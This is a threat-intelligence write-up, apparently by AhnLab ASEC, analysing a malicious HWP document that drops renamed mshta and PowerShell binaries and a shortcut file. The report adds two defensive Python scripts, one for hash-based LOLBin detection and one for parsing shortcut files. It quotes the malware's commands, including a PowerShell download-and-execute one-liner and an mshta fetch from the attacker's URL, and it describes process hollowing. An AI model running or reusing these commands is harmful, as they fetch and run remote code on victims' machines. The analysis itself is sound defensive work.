The ASEC analysis team has recently identified a malicious HWP file that abuses OLE objects and a Flash vulnerability. The file reaches out to a malicious URL first identified in 2020, which hosts a file exploiting the Flash vulnerability CVE-2018-15982, so users need to take caution.
The identified HWP file contains OLE objects, and when the document is opened the corresponding files are dropped into the %TEMP% folder. The dropped files are listed below. The HWP file does not invoke the well-known binaries powershell.exe and mshta.exe directly under their own names; instead it drops copies of them into %TEMP% under different names. This is most likely done to bypass behavior-based detection that keys on the original file names.
| File name | Description |
|---|---|
| hword.exe | Normal PowerShell program |
| hwp.exe | Normal mshta program |
| hwp.lnk | Malicious link file |
| 1234dd.tmp | Additional malicious HWP file |
The attacker placed a white rectangular image over the position where the objects are inserted to hide the OLE objects. Among the OLE objects inserted into the document, hword.exe and hwp.exe are legitimate files that run as-is in a Windows 10 environment.
Figure 1. OLE objects inserted into the document
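Because the dropped hword.exe and hwp.exe are byte-for-byte copies of legitimate system binaries, a name-based rule ("mshta.exe spawned from %TEMP%") misses them. The following script, added here as an example and not part of the ASEC analysis, hunts for such renamed copies by content hash instead: it hashes the real mshta.exe and powershell.exe on the host and then flags any file in user-writable directories with the same hash. The demo_tree() function builds a constructed sample layout with fake placeholder "binaries" so the script can be exercised offline; the system paths in SYSTEM_LOLBINS are the Windows defaults and are an assumption about the host.

```python
"""Find copies of known LOLBins hiding under other names in user-writable directories
(as with hword.exe / hwp.exe in %TEMP%), matching by content hash rather than file name."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Tuple

# Binaries the HWP sample copied and renamed; extend as needed. Default Windows paths (assumption).
SYSTEM_LOLBINS = [
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\SysWOW64\mshta.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_reference(originals: Iterable[str]) -> Dict[str, str]:
    """Map hash -> original file name for every reference binary that exists on this host.
    The reference must come from the same host: each Windows update changes these hashes."""
    return {sha256_file(p): os.path.basename(p).lower() for p in originals if os.path.isfile(p)}


def find_lolbin_copies(scan_dirs: Iterable[str], reference: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, original_name) for every file under scan_dirs whose content matches a
    reference binary. A copy is suspicious wherever it sits; a copy under another name more so."""
    hits = []
    for d in scan_dirs:
        for root, _dirs, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                try:
                    original = reference.get(sha256_file(path))
                except OSError:
                    continue
                if original:
                    hits.append((path, original))
    return hits


def demo_tree() -> Tuple[List[str], str]:
    """Constructed sample layout (placeholder bytes, not real PE files): fake 'System32'
    originals plus a %TEMP%-like folder with two renamed copies, one same-name copy and noise."""
    root = tempfile.mkdtemp(prefix="lolbin_demo_")
    sysdir, tmpdir = os.path.join(root, "System32"), os.path.join(root, "Temp")
    os.makedirs(sysdir)
    os.makedirs(tmpdir)
    contents = {"mshta.exe": b"MZ fake mshta", "powershell.exe": b"MZ fake powershell"}
    for name, blob in contents.items():
        with open(os.path.join(sysdir, name), "wb") as f:
            f.write(blob)
    dropped = (("hwp.exe", contents["mshta.exe"]), ("hword.exe", contents["powershell.exe"]),
               ("mshta.exe", contents["mshta.exe"]), ("notes.txt", b"just a text file"))
    for name, blob in dropped:
        with open(os.path.join(tmpdir, name), "wb") as f:
            f.write(blob)
    return [os.path.join(sysdir, n) for n in contents], tmpdir


if __name__ == "__main__":
    originals, scan_dir = demo_tree()          # swap for SYSTEM_LOLBINS and [os.environ["TEMP"]] on a real host
    for path, original in find_lolbin_copies([scan_dir], build_reference(originals)):
        kind = "renamed copy" if os.path.basename(path).lower() != original else "same-name copy"
        print(f"{path}: {kind} of {original}")
```

On a live host, replace the demo arguments with SYSTEM_LOLBINS and the user's %TEMP% and %LOCALAPPDATA% directories; a match whose file name differs from the original is exactly the hword.exe / hwp.exe pattern described above.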
Judging by the content of the document, it appears to have been distributed under a title such as 'profile form', as in past cases. The attacker placed a blank space carrying a hyperlink in each form field so that clicking the field launches the dropped malicious file.
Thus, when users click a field to fill out the form, the embedded hyperlink is followed and runs ..\appdata\local\temp\hwp.lnk. Because the hyperlink uses a relative path, it only resolves when the HWP file sits in a folder whose parent contains appdata\local\temp, that is, in a direct subfolder of the user profile such as Desktop or Downloads; saved anywhere else, the link simply fails and no malicious behavior occurs.
The link file launched by the hyperlink contains the following command. Since hwp.exe is the renamed copy of mshta.exe, the effect is that mshta fetches and executes whatever the malicious URL returns:
- %tmp%\hwp.exe "hxxp://yukkimmo.sportsontheweb[.]net/hw.php"
At the time of analysis, the URL above only returns a command that terminates hwp.exe. However, because the content is fetched at run time, any command can be served depending on the attacker's intent.
Aside from the command that terminates hwp.exe, an additional command believed to be served from the same URL was observed in AhnLab's infrastructure. It runs PowerShell under the filename 'hword.exe', fetches hxxp://yukkimmo.sportsontheweb[.]net/h.txt, which contains a malicious script, and executes it in memory via Invoke-Expression (iex) without writing it to disk:
- hword.exe -nop -c "iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')"
The script does the following:
1. Downloads and runs additional PE data
The script downloads additional PE data from hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt and saves it in the %temp% folder as '2247529.txt'. The data is then executed by process hollowing into System32\cmd.exe: a cmd.exe process is started suspended, its image is replaced with the downloaded PE, and execution resumes so that the payload runs under a trusted process name.
When the PE data runs, it looks in the user's Recent folder (where Windows keeps a shortcut for every recently opened document) for the shortcut whose name contains '.hwp.lnk', and records the path of the HWP file it points to in %appdata%\12312.txt. This is how the malware locates the document the user originally opened.
2. Replaces the original HWP file with the previously dropped 1234dd.tmp
The '1234dd.tmp' file dropped when the HWP file was opened is copied under the name '3dd21.tmp'. Next, the HWP file path recorded in %appdata%\12312.txt is read, and the HWP file at that path is overwritten with the copied 3dd21.tmp. As a result, when users open the document again, they get the HWP file (1234dd.tmp) with an embedded Flash object instead of the one described above. The replacement HWP file's content and file properties are similar to those of the original, so the swap is not obvious to the user.
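Two steps of this chain turn on .lnk files: the dropped hwp.lnk carries the mshta command line, and the payload reads Recent\*.hwp.lnk to find the document to overwrite. The following parser, added here as an example and not code from ASEC or from the malware, recovers both from the raw MS-SHLLINK structures using only the standard library: the LinkInfo LocalBasePath (what a Recent-folder shortcut points to), the StringData fields (relative path and command-line arguments) and the EnvironmentVariableDataBlock (the unexpanded %tmp%\hwp.exe style target). The build_lnk() helper constructs minimal, spec-conformant shortcuts so the demo runs offline; the sample file names and the C:\Users\victim\... paths are constructed for the demo, and the URL argument is the one from the analysis above.

```python
"""Minimal MS-SHLLINK (.lnk) parser for triage: recovers the target and the
command-line arguments of a shortcut without COM or third-party modules."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE, HAS_EXP_STRING = 0x10, 0x20, 0x40, 0x80, 0x200
ENV_BLOCK_SIG = 0xA0000001   # EnvironmentVariableDataBlock: unexpanded %VAR% target path
ANSI = "cp1252"              # assumption: use "cp949" when triaging a Korean-locale host


@dataclass
class Lnk:
    local_base_path: Optional[str] = None   # LinkInfo.LocalBasePath (resolved drive path)
    env_target: Optional[str] = None        # e.g. %tmp%\hwp.exe
    relative_path: Optional[str] = None
    arguments: Optional[str] = None
    name: Optional[str] = None
    working_dir: Optional[str] = None
    icon_location: Optional[str] = None


def parse_lnk(data: bytes) -> Lnk:
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    lnk, pos = Lnk(), 0x4C
    if flags & HAS_IDLIST:                              # skip the LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                              # VolumeIDAndLocalBasePath present
            end = data.index(b"\x00", pos + lbp_off)
            lnk.local_base_path = data[pos + lbp_off:end].decode(ANSI, "replace")
        pos += size

    def read_string() -> str:                           # StringData: CountCharacters + chars
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + (2 * n if flags & IS_UNICODE else n)]
        pos += len(raw)
        return raw.decode("utf-16-le" if flags & IS_UNICODE else ANSI, "replace")

    for bit, attr in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if flags & bit:
            setattr(lnk, attr, read_string())
    while pos + 8 <= len(data):                         # ExtraData blocks until a block < 4 bytes
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 4:
            break
        if sig == ENV_BLOCK_SIG and size == 0x314:      # 260 ANSI bytes, then 520 UTF-16 bytes
            lnk.env_target = data[pos + 268:pos + 788].decode("utf-16-le").split("\x00", 1)[0]
        pos += size
    return lnk


def launch_command(data: bytes) -> str:
    """'target arguments' as the shell would run it, preferring the unexpanded %VAR% form."""
    lnk = parse_lnk(data)
    target = lnk.env_target or lnk.local_base_path or lnk.relative_path or "<unknown target>"
    return f"{target} {lnk.arguments}" if lnk.arguments else target


def recent_hwp_targets(recent_lnks: Dict[str, bytes]) -> List[str]:
    """The payload's lookup: paths of recently opened .hwp files, taken from Recent\\*.hwp.lnk."""
    out = []
    for name, blob in sorted(recent_lnks.items()):
        if name.lower().endswith(".hwp.lnk"):
            target = parse_lnk(blob).local_base_path
            if target:
                out.append(target)
    return out


def build_lnk(arguments=None, relative_path=None, local_base_path=None, env_target=None) -> bytes:
    """Build a minimal spec-conformant .lnk; used only to construct samples for the demo."""
    flags, body = IS_UNICODE, b""
    if local_base_path is not None:
        flags |= HAS_LINKINFO
        vol = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # fixed drive, empty label
        lbp = local_base_path.encode(ANSI) + b"\x00"
        lbp_off = 0x1C + len(vol)
        suffix_off = lbp_off + len(lbp)                            # empty CommonPathSuffix
        body += struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, lbp_off, 0, suffix_off)
        body += vol + lbp + b"\x00"
    for bit, s in ((HAS_RELPATH, relative_path), (HAS_ARGS, arguments)):   # spec order
        if s is not None:
            flags |= bit
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    if env_target is not None:
        flags |= HAS_EXP_STRING
        body += struct.pack("<II", 0x314, ENV_BLOCK_SIG)
        body += env_target.encode(ANSI).ljust(260, b"\x00") + env_target.encode("utf-16-le").ljust(520, b"\x00")
    body += struct.pack("<I", 0)                                   # terminal block
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body


if __name__ == "__main__":
    # Constructed sample of the dropped hwp.lnk: %tmp%\hwp.exe (the renamed mshta) plus the URL argument.
    sample = build_lnk(arguments='"hxxp://yukkimmo.sportsontheweb[.]net/hw.php"',
                       relative_path=r".\hwp.exe", env_target=r"%tmp%\hwp.exe")
    print("hwp.lnk runs:", launch_command(sample))
    # Constructed Recent folder contents: one .hwp.lnk and one unrelated shortcut (hypothetical paths).
    recent = {"profile_form.hwp.lnk": build_lnk(local_base_path=r"C:\Users\victim\Desktop\profile_form.hwp"),
              "notes.txt.lnk": build_lnk(local_base_path=r"C:\Users\victim\Desktop\notes.txt")}
    print("recently opened HWP files:", recent_hwp_targets(recent))
```

For a real case, feed parse_lnk() the bytes of the dropped hwp.lnk to recover the mshta command line, and pass the contents of %APPDATA%\Microsoft\Windows\Recent to recent_hwp_targets() to see which document the payload would have overwritten; shortcuts whose target is only in the ItemIDList (no LinkInfo) are skipped by this minimal parser, so an empty result is "not found", not "nothing opened".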
The replacement HWP file (1234dd.tmp) contains a Flash object. Checking the object's properties shows a specific URL embedded in it.
The confirmed URL is hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php, which was first identified in 2020 and hosts a file exploiting the Flash vulnerability CVE-2018-15982.
Below is an additionally identified HWP file. This one was disguised as a personal data collection form for the payment of service fees and likewise contains embedded OLE objects. Apart from 1234dd.tmp (the HWP file), the files dropped when the document is opened are identical to those described above.
This file also has hyperlinks embedded in every field except the contact field. When users click a field, ..\appdata\local\temp\hwp.lnk is executed, and the LNK file in turn runs hwp.exe with "hxxp://yukkimmo.sportsontheweb[.]net/hw.php" as its argument. Its behavior and the URL it accesses are the same as for the previous file; the only difference is that the dropped '1234dd.tmp' has no Flash object embedded in it.
As cases exploiting previously known vulnerabilities continue to be discovered, users need to take caution. Furthermore, because this malware receives additional commands from the attacker and executes them, any number of malicious behaviors can follow. Users must refrain from opening document files from unknown sources and keep their applications and V3 updated to the latest version.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.